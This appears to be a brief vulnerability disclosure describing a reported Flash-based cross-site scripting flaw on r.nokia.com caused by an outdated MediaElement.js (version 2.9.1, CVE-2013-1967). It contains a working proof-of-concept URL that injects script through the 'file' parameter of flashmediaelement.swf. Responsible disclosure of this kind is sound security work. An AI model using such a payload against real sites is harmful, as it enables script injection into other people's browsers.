Here I present a (reported) Flash-based XSS vulnerability I discovered in r.nokia.com, requiring no user interaction.
PoC URL:
http://r.nokia.com/s/6.0/assets/js/flashmediaelement.swf?debug=true&file=x%22});alert(1);//&autoplay=true
This is a well known vulnerability with MediaElement.js, that has been patched last year from version 2.11.2 (see CVE-2013-1967, GitHub patch commit).
The version running on r.nokia.com used to be 2.9.1, as could be seen in:
http://r.nokia.com/s/6.0/assets/js/mediaelement-and-player.js
( mejs.version="2.9.1"; )
Screenshot using the Chrome debugger:
Screenshot of the XSS vulnerability triggered
